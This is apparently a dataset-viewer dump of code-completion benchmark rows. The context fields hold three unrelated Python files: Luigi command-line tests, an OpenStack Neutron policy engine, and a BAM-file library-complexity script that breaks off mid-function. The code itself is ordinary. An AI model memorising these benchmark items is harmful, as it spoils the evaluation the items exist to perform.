gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import mock
import os
import subprocess
from helpers import unittest
from luigi import six
import luigi
from luigi.mock import MockTarget
class SomeTask(luigi.Task):
n = luigi.IntParameter()
def output(self):
return MockTarget('/tmp/test_%d' % self.n)
def run(self):
f = self.output().open('w')
f.write('done')
f.close()
class AmbiguousClass(luigi.Task):
pass
class AmbiguousClass(luigi.Task): # NOQA
pass
class TaskWithSameName(luigi.Task):
def run(self):
self.x = 42
class TaskWithSameName(luigi.Task): # NOQA
# there should be no ambiguity
def run(self):
self.x = 43
class WriteToFile(luigi.Task):
filename = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.filename)
def run(self):
f = self.output().open('w')
print('foo', file=f)
f.close()
class FooBaseClass(luigi.Task):
x = luigi.Parameter(default='foo_base_default')
class FooSubClass(FooBaseClass):
pass
class CmdlineTest(unittest.TestCase):
def setUp(self):
MockTarget.fs.clear()
@mock.patch("logging.getLogger")
def test_cmdline_main_task_cls(self, logger):
luigi.run(['--local-scheduler', '--no-lock', '--n', '100'], main_task_cls=SomeTask)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_100': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_local_scheduler(self, logger):
luigi.run(['SomeTask', '--no-lock', '--n', '101'], local_scheduler=True)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_101': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_other_task(self, logger):
luigi.run(['--local-scheduler', '--no-lock', 'SomeTask', '--n', '1000'])
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_1000': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_ambiguous_class(self, logger):
self.assertRaises(Exception, luigi.run, ['--local-scheduler', '--no-lock', 'AmbiguousClass'])
@mock.patch("logging.getLogger")
@mock.patch("logging.StreamHandler")
def test_setup_interface_logging(self, handler, logger):
handler.return_value = mock.Mock(name="stream_handler")
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
luigi.interface.setup_interface_logging()
self.assertEqual([mock.call(handler.return_value)], logger.return_value.addHandler.call_args_list)
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
if six.PY2:
error = ConfigParser.NoSectionError
else:
error = KeyError
self.assertRaises(error, luigi.interface.setup_interface_logging, '/blah')
@mock.patch("warnings.warn")
@mock.patch("luigi.interface.setup_interface_logging")
def test_cmdline_logger(self, setup_mock, warn):
with mock.patch("luigi.interface.core") as env_params:
env_params.return_value.logging_conf_file = None
luigi.run(['SomeTask', '--n', '7', '--local-scheduler', '--no-lock'])
self.assertEqual([mock.call(None)], setup_mock.call_args_list)
with mock.patch("luigi.configuration.get_config") as getconf:
getconf.return_value.get.side_effect = ConfigParser.NoOptionError(section='foo', option='bar')
getconf.return_value.getint.return_value = 0
luigi.interface.setup_interface_logging.call_args_list = []
luigi.run(['SomeTask', '--n', '42', '--local-scheduler', '--no-lock'])
self.assertEqual([], setup_mock.call_args_list)
@mock.patch('argparse.ArgumentParser.print_usage')
def test_non_existent_class(self, print_usage):
self.assertRaises(luigi.task_register.TaskClassNotFoundException,
luigi.run, ['--local-scheduler', '--no-lock', 'XYZ'])
@mock.patch('argparse.ArgumentParser.print_usage')
def test_no_task(self, print_usage):
self.assertRaises(SystemExit, luigi.run, ['--local-scheduler', '--no-lock'])
class InvokeOverCmdlineTest(unittest.TestCase):
def _run_cmdline(self, args):
env = os.environ.copy()
env['PYTHONPATH'] = env.get('PYTHONPATH', '') + ':.:test'
print('Running: ' + ' '.join(args)) # To simplify rerunning failing tests
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = p.communicate() # Unfortunately subprocess.check_output is 2.7+
return p.returncode, stdout, stderr
def test_bin_luigi(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['./bin/luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', 'test/cmdline_test.py', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_python_module(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', '-m', 'luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_direct_python_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_python_module_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi', '--module', 'cmdline_test', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_bin_luigi_help_no_module(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertTrue(stdout.find(b'usage:') != -1)
def test_bin_luigi_help_not_spammy(self):
"""
Test that `luigi --help` fits on one screen
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertLessEqual(len(stdout.splitlines()), 15)
def test_bin_luigi_all_help_spammy(self):
"""
Test that `luigi --help-all` doesn't fit on a screen
Naturally, I don't mind this test breaking, but it convinces me that
the "not spammy" test is actually testing what it claims too.
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help-all'])
self.assertGreater(len(stdout.splitlines()), 15)
def test_error_mesage_on_misspelled_task(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', 'RangeDaili'])
self.assertTrue(stderr.find(b'RangeDaily') != -1)
def test_bin_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_python_module_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_bin_luigi_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_python_module_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_options_before_task(self):
args = ['./bin/luigi', '--module', 'cmdline_test', '--no-lock', '--local-scheduler', '--FooBaseClass-x', 'hello', 'FooBaseClass']
returncode, stdout, stderr = self._run_cmdline(args)
self.assertEqual(0, returncode)
def test_bin_fail_on_unrecognized_args(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--no-lock', '--local-scheduler', 'Task', '--unknown-param', 'hiiii'])
self.assertNotEqual(0, returncode)
def test_deps_py_script(self):
"""
Test the deps.py script.
"""
args = 'python luigi/tools/deps.py --module examples.top_artists ArtistToplistToDatabase --date-interval 2015-W10'.split()
returncode, stdout, stderr = self._run_cmdline(args)
self.assertEqual(0, returncode)
self.assertTrue(stdout.find(b'[FileSystem] data/streams_2015_03_04_faked.tsv') != -1)
self.assertTrue(stdout.find(b'[DB] localhost') != -1)
def test_bin_mentions_misspelled_task(self):
"""
Test that the error message is informative when a task is misspelled.
In particular it should say that the task is misspelled and not that
the local parameters do not exist.
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'HooBaseClass', '--x 5'])
self.assertTrue(stderr.find(b'FooBaseClass') != -1)
self.assertTrue(stderr.find(b'--x') != 0)
if __name__ == '__main__':
# Needed for one of the tests
luigi.run()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Policy engine for neutron. Largely copied from nova.
"""
import itertools
import re
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import exceptions
import neutron.common.utils as utils
from neutron import manager
from neutron.openstack.common import excutils
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import policy
LOG = logging.getLogger(__name__)
_POLICY_PATH = None
_POLICY_CACHE = {}
ADMIN_CTX_POLICY = 'context_is_admin'
# Maps deprecated 'extension' policies to new-style policies
DEPRECATED_POLICY_MAP = {
'extension:provider_network':
['network:provider:network_type',
'network:provider:physical_network',
'network:provider:segmentation_id'],
'extension:router':
['network:router:external'],
'extension:port_binding':
['port:binding:vif_type', 'port:binding:vif_details',
'port:binding:profile', 'port:binding:host_id']
}
DEPRECATED_ACTION_MAP = {
'view': ['get'],
'set': ['create', 'update']
}
cfg.CONF.import_opt('policy_file', 'neutron.common.config')
def reset():
global _POLICY_PATH
global _POLICY_CACHE
_POLICY_PATH = None
_POLICY_CACHE = {}
policy.reset()
def init():
global _POLICY_PATH
global _POLICY_CACHE
if not _POLICY_PATH:
_POLICY_PATH = utils.find_config_file({}, cfg.CONF.policy_file)
if not _POLICY_PATH:
raise exceptions.PolicyFileNotFound(path=cfg.CONF.policy_file)
# pass _set_brain to read_cached_file so that the policy brain
# is reset only if the file has changed
utils.read_cached_file(_POLICY_PATH, _POLICY_CACHE,
reload_func=_set_rules)
def get_resource_and_action(action):
"""Extract resource and action (write, read) from api operation."""
data = action.split(':', 1)[0].split('_', 1)
return ("%ss" % data[-1], data[0] != 'get')
def _set_rules(data):
default_rule = 'default'
LOG.debug(_("Loading policies from file: %s"), _POLICY_PATH)
# Ensure backward compatibility with folsom/grizzly convention
# for extension rules
policies = policy.Rules.load_json(data, default_rule)
for pol in policies.keys():
if any([pol.startswith(depr_pol) for depr_pol in
DEPRECATED_POLICY_MAP.keys()]):
LOG.warn(_("Found deprecated policy rule:%s. Please consider "
"upgrading your policy configuration file"), pol)
pol_name, action = pol.rsplit(':', 1)
try:
new_actions = DEPRECATED_ACTION_MAP[action]
new_policies = DEPRECATED_POLICY_MAP[pol_name]
# bind new actions and policies together
for actual_policy in ['_'.join(item) for item in
itertools.product(new_actions,
new_policies)]:
if actual_policy not in policies:
# New policy, same rule
LOG.info(_("Inserting policy:%(new_policy)s in place "
"of deprecated policy:%(old_policy)s"),
{'new_policy': actual_policy,
'old_policy': pol})
policies[actual_policy] = policies[pol]
# Remove old-style policy
del policies[pol]
except KeyError:
LOG.error(_("Backward compatibility unavailable for "
"deprecated policy %s. The policy will "
"not be enforced"), pol)
policy.set_rules(policies)
def _is_attribute_explicitly_set(attribute_name, resource, target):
"""Verify that an attribute is present and has a non-default value."""
return ('default' in resource[attribute_name] and
attribute_name in target and
target[attribute_name] is not attributes.ATTR_NOT_SPECIFIED and
target[attribute_name] != resource[attribute_name]['default'])
def _build_subattr_match_rule(attr_name, attr, action, target):
"""Create the rule to match for sub-attribute policy checks."""
# TODO(salv-orlando): Instead of relying on validator info, introduce
# typing for API attributes
# Expect a dict as type descriptor
validate = attr['validate']
key = filter(lambda k: k.startswith('type:dict'), validate.keys())
if not key:
LOG.warn(_("Unable to find data type descriptor for attribute %s"),
attr_name)
return
data = validate[key[0]]
if not isinstance(data, dict):
LOG.debug(_("Attribute type descriptor is not a dict. Unable to "
"generate any sub-attr policy rule for %s."),
attr_name)
return
sub_attr_rules = [policy.RuleCheck('rule', '%s:%s:%s' %
(action, attr_name,
sub_attr_name)) for
sub_attr_name in data if sub_attr_name in
target[attr_name]]
return policy.AndCheck(sub_attr_rules)
def _build_match_rule(action, target):
"""Create the rule to match for a given action.
The policy rule to be matched is built in the following way:
1) add entries for matching permission on objects
2) add an entry for the specific action (e.g.: create_network)
3) add an entry for attributes of a resource for which the action
is being executed (e.g.: create_network:shared)
4) add an entry for sub-attributes of a resource for which the
action is being executed
(e.g.: create_router:external_gateway_info:network_id)
"""
match_rule = policy.RuleCheck('rule', action)
resource, is_write = get_resource_and_action(action)
# Attribute-based checks shall not be enforced on GETs
if is_write:
# assigning to variable with short name for improving readability
res_map = attributes.RESOURCE_ATTRIBUTE_MAP
if resource in res_map:
for attribute_name in res_map[resource]:
if _is_attribute_explicitly_set(attribute_name,
res_map[resource],
target):
attribute = res_map[resource][attribute_name]
if 'enforce_policy' in attribute:
attr_rule = policy.RuleCheck('rule', '%s:%s' %
(action, attribute_name))
# Build match entries for sub-attributes, if present
validate = attribute.get('validate')
if (validate and any([k.startswith('type:dict') and v
for (k, v) in
validate.iteritems()])):
attr_rule = policy.AndCheck(
[attr_rule, _build_subattr_match_rule(
attribute_name, attribute,
action, target)])
match_rule = policy.AndCheck([match_rule, attr_rule])
return match_rule
# This check is registered as 'tenant_id' so that it can override
# GenericCheck which was used for validating parent resource ownership.
# This will prevent us from having to handling backward compatibility
# for policy.json
# TODO(salv-orlando): Reinstate GenericCheck for simple tenant_id checks
@policy.register('tenant_id')
class OwnerCheck(policy.Check):
"""Resource ownership check.
This check verifies the owner of the current resource, or of another
resource referenced by the one under analysis.
In the former case it falls back to a regular GenericCheck, whereas
in the latter case it leverages the plugin to load the referenced
resource and perform the check.
"""
def __init__(self, kind, match):
# Process the match
try:
self.target_field = re.findall('^\%\((.*)\)s$',
match)[0]
except IndexError:
err_reason = (_("Unable to identify a target field from:%s."
"match should be in the form %%(<field_name>)s") %
match)
LOG.exception(err_reason)
raise exceptions.PolicyInitError(
policy="%s:%s" % (kind, match),
reason=err_reason)
super(OwnerCheck, self).__init__(kind, match)
def __call__(self, target, creds):
if self.target_field not in target:
# policy needs a plugin check
# target field is in the form resource:field
# however if they're not separated by a colon, use an underscore
# as a separator for backward compatibility
def do_split(separator):
parent_res, parent_field = self.target_field.split(
separator, 1)
return parent_res, parent_field
for separator in (':', '_'):
try:
parent_res, parent_field = do_split(separator)
break
except ValueError:
LOG.debug(_("Unable to find ':' as separator in %s."),
self.target_field)
else:
# If we are here split failed with both separators
err_reason = (_("Unable to find resource name in %s") %
self.target_field)
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
parent_foreign_key = attributes.RESOURCE_FOREIGN_KEYS.get(
"%ss" % parent_res, None)
if not parent_foreign_key:
err_reason = (_("Unable to verify match:%(match)s as the "
"parent resource: %(res)s was not found") %
{'match': self.match, 'res': parent_res})
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
# NOTE(salv-orlando): This check currently assumes the parent
# resource is handled by the core plugin. It might be worth
# having a way to map resources to plugins so to make this
# check more general
f = getattr(manager.NeutronManager.get_instance().plugin,
'get_%s' % parent_res)
# f *must* exist, if not found it is better to let neutron
# explode. Check will be performed with admin context
context = importutils.import_module('neutron.context')
try:
data = f(context.get_admin_context(),
target[parent_foreign_key],
fields=[parent_field])
target[self.target_field] = data[parent_field]
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Policy check error while calling %s!'), f)
match = self.match % target
if self.kind in creds:
return match == unicode(creds[self.kind])
return False
@policy.register('field')
class FieldCheck(policy.Check):
def __init__(self, kind, match):
# Process the match
resource, field_value = match.split(':', 1)
field, value = field_value.split('=', 1)
super(FieldCheck, self).__init__(kind, '%s:%s:%s' %
(resource, field, value))
# Value might need conversion - we need help from the attribute map
try:
attr = attributes.RESOURCE_ATTRIBUTE_MAP[resource][field]
conv_func = attr['convert_to']
except KeyError:
conv_func = lambda x: x
self.field = field
self.value = conv_func(value)
def __call__(self, target_dict, cred_dict):
target_value = target_dict.get(self.field)
# target_value might be a boolean, explicitly compare with None
if target_value is None:
LOG.debug(_("Unable to find requested field: %(field)s in "
"target: %(target_dict)s"),
{'field': self.field,
'target_dict': target_dict})
return False
return target_value == self.value
def _prepare_check(context, action, target):
"""Prepare rule, target, and credentials for the policy engine."""
# Compare with None to distinguish case in which target is {}
if target is None:
target = {}
match_rule = _build_match_rule(action, target)
credentials = context.to_dict()
return match_rule, target, credentials
def check(context, action, target, plugin=None, might_not_exist=False):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:param might_not_exist: If True the policy check is skipped (and the
function returns True) if the specified policy does not exist.
Defaults to false.
:return: Returns True if access is permitted else False.
"""
if might_not_exist and not (policy._rules and action in policy._rules):
return True
return policy.check(*(_prepare_check(context, action, target)))
def enforce(context, action, target, plugin=None):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:raises neutron.exceptions.PolicyNotAuthorized: if verification fails.
"""
rule, target, credentials = _prepare_check(context, action, target)
result = policy.check(rule, target, credentials, action=action)
if not result:
LOG.debug(_("Failed policy check for '%s'"), action)
raise exceptions.PolicyNotAuthorized(action=action)
return result
def check_is_admin(context):
"""Verify context has admin rights according to policy settings."""
init()
# the target is user-self
credentials = context.to_dict()
target = credentials
# Backward compatibility: if ADMIN_CTX_POLICY is not
# found, default to validating role:admin
admin_policy = (ADMIN_CTX_POLICY in policy._rules
and ADMIN_CTX_POLICY or 'role:admin')
return policy.check(admin_policy, target, credentials)
def _extract_roles(rule, roles):
if isinstance(rule, policy.RoleCheck):
roles.append(rule.match.lower())
elif isinstance(rule, policy.RuleCheck):
_extract_roles(policy._rules[rule.match], roles)
elif hasattr(rule, 'rules'):
for rule in rule.rules:
_extract_roles(rule, roles)
def get_admin_roles():
"""Return a list of roles which are granted admin rights according
to policy settings.
"""
# NOTE(salvatore-orlando): This function provides a solution for
# populating implicit contexts with the appropriate roles so that
# they correctly pass policy checks, and will become superseded
# once all explicit policy checks are removed from db logic and
# plugin modules. For backward compatibility it returns the literal
# admin if ADMIN_CTX_POLICY is not defined
init()
if not policy._rules or ADMIN_CTX_POLICY not in policy._rules:
return ['admin']
try:
admin_ctx_rule = policy._rules[ADMIN_CTX_POLICY]
except (KeyError, TypeError):
return
roles = []
_extract_roles(admin_ctx_rule, roles)
return roles
|
|
#!/usr/bin/env python
'''
The MIT License (MIT)
Copyright (c) <2016> <Mathias Lesche>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
contact: mat.lesche(at)gmail.com
'''
''' python modules '''
import logging
import pysam
from argparse import ArgumentParser
from argparse import ArgumentTypeError
from argparse import RawDescriptionHelpFormatter
from collections import defaultdict
from os import chmod
from os.path import join as pathjoin, isfile
from random import shuffle
from random import seed
from sys import stdin
from types import NoneType
''' own modules '''
from support.io_module import check_Directorylist
from support.io_module import add_Separator
from support.io_module import create_Directory
from support.io_module import check_Fileslist
from support.io_module import write_list
from support.main_logger import MainLogger
class Parser(object):
def __init__(self):
self.__parser = ArgumentParser(description="""
Script parses a given sam/bam file via -a or stdin and
calculates the number of new reference position or fragments
in a subsample and the whole input. Data is written back
and can be visualised with an R script
""", formatter_class=RawDescriptionHelpFormatter)
self.initialiseParser()
self.__inputfile = ''
self.__display = -1
self.__bfxid = ''
self.__subsample = 1000000
self.__frags = False
self.__mapping = False
self.__complexity = False
self.__subset = ''
self.__logger = logging.getLogger('dsp.report.calc_FragComplexity')
self.parse()
def initialiseParser(self):
self.__parser.add_argument('-a', '--alignment', type=self.checkalignment, metavar='FILE', dest='input', nargs = '?', default = stdin, help="alignment file (default: stdin)")
self.__parser.add_argument('-b', '--bfx', type=str, metavar='STRING', dest='bfx', required = True , help="bfx id of the project")
self.__parser.add_argument('-i', '--intervalsize', type=int, metavar='INT', dest='subsample', default = 1000000, help="subsample size for complexity calculation (default: 1000000)")
self.__parser.add_argument("-f", "--fragment", dest = 'frags', action= 'store_true', help= 'run in fragment mode, standard is position mode')
self.__parser.add_argument("-m", "--mapping", dest = 'mapping', action= 'store_true', help= 'create mapping stats')
self.__parser.add_argument("-l", "--libcomplexity", dest = 'complexity', action= 'store_true', help= 'create library complexity stats')
# self.__parser.add_argument('-r', '--runmode', type=str, metavar='DIRECTORY', dest='runmode', default='se', choices = ['se', 'pe'], help='run in single-/end (se) or paired-end (pe)')
self.__parser.add_argument('-o', '--output', type=str, metavar='DIRECTORY', dest='output', required=True, help='output directory for table file')
self.__parser.add_argument('-s', '--subset', type=str, metavar='STRING', dest='subset', required = True, choices = ['Complete', 'Gene'], help='subset which is used for the complexity calculation (Complete, Gene)')
'''
methods checks if input is a bam/sam file and assigns pysam object to it
@param infile: string
@return: pysam AlignmentFile
'''
def checkalignment(self, infile):
good, bad = check_Fileslist([infile])
goodfiles = [i for i in good if i.endswith(('bam', 'sam'))]
badfiles = [i for i in good if not i.endswith(('bam', 'sam'))]
badfiles.extend(bad)
msg = 'check the input file'
if len(badfiles) != 0:
raise ArgumentTypeError(msg)
if len(goodfiles) != 1:
raise ArgumentTypeError(msg)
if goodfiles[0].endswith('bam'):
return pysam.AlignmentFile(goodfiles[0], 'rb')
else:
return pysam.AlignmentFile(goodfiles[0], 'r')
def parse(self, inputstring = None):
if isinstance(inputstring, NoneType):
self.__options = self.__parser.parse_args()
else:
self.__options = self.__parser.parse_args(inputstring)
def show_log(self, level, message):
if level == 'debug':
self.__logger.debug(message)
elif level == 'info':
self.__logger.info(message)
elif level == 'warning':
self.__logger.warning(message)
elif level == 'error':
self.__logger.error(message)
elif level == 'critical':
self.__logger.critical(message)
'''
method check if the output directory exists
'''
def check_output(self):
output = self.__options.output
good = check_Directorylist((output, ))[0]
if len(good) != 1:
self.show_log('error', "check output directory: {0}".format(output))
exit(2)
self.__output = good[0]
def main(self):
self.check_output()
self.__subset = self.__options.subset
self.__bfxid = self.__options.bfx
self.__frags = self.__options.frags
self.__mapping = self.__options.mapping
self.__complexity = self.__options.complexity
self.__inputfile = self.__options.input
if isinstance(self.__inputfile, file):
try:
self.__inputfile = pysam.AlignmentFile('-')
except ValueError:
self.show_log('error', 'Check if input is bam/sam')
exit(2)
self.__subsample = self.__options.subsample
if self.__subsample == 0 or self.__subsample % 10000 != 0:
self.show_log('error', 'Subsample size (-i) should be > 0 and multiple of 10,000')
exit(2)
if not self.__mapping and not self.__complexity:
self.show_log('error', '(-m) or (-l) option is required')
exit(2)
def get_inputfile(self):
return self.__inputfile
def get_bfx(self):
return self.__bfxid
def get_subset(self):
return self.__subset
def get_complexity(self):
return self.__complexity
def get_output(self):
return self.__output
def get_subsample(self):
return self.__subsample
def get_frags(self):
return self.__frags
def get_mapping(self):
return self.__mapping
bfx = property(get_bfx, None, None, None)
subset = property(get_subset, None, None, None)
output = property(get_output, None, None, None)
subsample = property(get_subsample, None, None, None)
mappingstats = property(get_mapping)
inputfile = property(get_inputfile)
frags = property(get_frags, None, None, None)
complexity = property(get_complexity)
class CalcComplexity(object):
def __init__(self, inputfile, output, bfx, stepsize, fragmode, mappingstat, subset, complexity):
seed(42)
self.__inputfile = inputfile
self.__output = output
self.__bfx = bfx
self.__stepsize = stepsize
self.__fragmode = fragmode
self.__mappingstat = mappingstat
self.__subset = subset
self.__complexity = complexity
self.__rgdict = defaultdict(dict)
self.__logger = logging.getLogger('dsp.report.calc_FragComplexity')
self.__aligner = []
self.__headercomplex = 'Subsample\tUnique\tUniqPerc\tNew\tNewPerc\tLibrary\tSample\tReadgroup\tType\tAligner\tLevel\n'
self.__headermapping = 'Library\tSample\tReadgroup\tType\tFragments\tPercentage\tString\tAligner\tLevel\n'
self.get_libsample()
self.get_alignmentprog()
self.__complexoutputfile = pathjoin(self.__output, '{0}_{1}_alignment_complexity.csv'.format(self.__bfx, '_'.join(self.__rgdict.keys())))
self.__alignoutputfile = pathjoin(self.__output, '{0}_{1}_alignment_stats.csv'.format(self.__bfx, '_'.join(self.__rgdict.keys())))
def show_log(self, level, message):
if level == 'debug':
self.__logger.debug(message)
elif level == 'info':
self.__logger.info(message)
elif level == 'warning':
self.__logger.warning(message)
elif level == 'error':
self.__logger.error(message)
elif level == 'critical':
self.__logger.critical(message)
def get_libsample(self):
try:
for entry in self.__inputfile.header['RG']:
lib, sample, ids = entry['LB'], entry['SM'], entry['ID']
self.__rgdict[ids]['libid'] = (lib, sample)
self.__rgdict[ids]['processed'] = 0
self.__rgdict[ids]['aligned'] = 0
self.__rgdict[ids]['uniq'] = 0
self.__rgdict[ids]['list'] = []
self.__rgdict[ids]['coordlist'] = []
self.show_log('info', 'Found read group ID: {0} - Lib: {1} - Sample: {2}'.format(ids, lib, sample))
except KeyError:
self.show_log('warning', 'No read group ID was found, set to "none"')
self.__rgdict['none']['libid'] = ('none', 'none')
self.__rgdict['none']['processed'] = 0
self.__rgdict['none']['aligned'] = 0
self.__rgdict['none']['uniq'] = 0
self.__rgdict['none']['list'] = []
self.__rgdict['none']['coordlist'] = []
def get_alignmentprog(self):
pgs = self.__inputfile.header['PG']
for i in pgs:
if i['PN'].lower() == 'gsnap':
self.show_log('info', 'Aligner is: {0}'.format(i['PN']))
self.__aligner.append('gsnap')
elif i['PN'].lower() == 'bwa':
self.show_log('info', 'Aligner is: {0}'.format(i['PN']))
self.__aligner.append('bwa')
if len(self.__aligner) == 0:
self.show_log('info', 'No Aligner found, using NH tags to define uniq fragments')
self.__aligner = 'gsnap'
elif len(self.__aligner) > 1:
self.show_log('info', 'Multiple Aligner found, using NH tags to define uniq fragments')
self.__aligner = 'gsnap'
else:
self.__aligner = self.__aligner[0].lower()
'''
steps is formatted into a string which shows number of millions
@param number: int
@return: string
'''
def get_stepsize(self, number):
number = str(number)
length = len(str(number))
if self.__stepsize < 100000:
if length == 5:
return '0.0{0}'.format(number[0])
elif length == 6:
return '0.{0}'.format(number[0:2])
elif length == 7:
return '{0}.{1}'.format(number[0], number[1:3])
elif length == 8:
return '{0}.{1}'.format(number[:2], number[2:4])
elif length == 9:
return '{0}.{1}'.format(number[:3], number[3:5])
elif length == 10:
return '{0}.{1}'.format(number[:4], number[4:6])
else:
if length == 6:
return '0.{0}'.format(number[0])
elif length == 7:
return '{0}.{1}'.format(number[0], number[1])
elif length == 8:
return '{0}.{1}'.format(number[:2], number[2])
elif length == 9:
return '{0}.{1}'.format(number[:3], number[3])
elif length == 10:
return '{0}.{1}'.format(number[:4], number[4])
def calc_fragmentcomplexity(self, rg, lib, sample, fragmentlist):
start, end = 0, self.__stepsize
# reduced by one self.__stepsize because the last subsample wouldn't be complete
steps = xrange(0, len(fragmentlist)-self.__stepsize, self.__stepsize)
if len(steps) == 0:
self.show_log('warning', 'Library size of RG: {0} - Lib: {1} - Sample: {2} is to small for the subsample step of {3}'.format(rg, lib, sample, self.__stepsize))
return
# stores the complete set of unique positions or fragments
uniqfragments = set()
for i in steps:
oldsizeset = len(uniqfragments) # how many fragments are unique in the previous subsamples
rtstep = i + self.__stepsize # because it starts with 0, increase
stepstring = self.get_stepsize(rtstep)
subsampleset = set(fragmentlist[start:end]) # get a subset of the fragmentlist and make it unique
uniqfragments = uniqfragments | subsampleset # add them to the complete unique set
uniq = len(uniqfragments) # how many fragments are unique in current and previous subsamples
newuniq = uniq - oldsizeset # how many are newly added to complete unique set
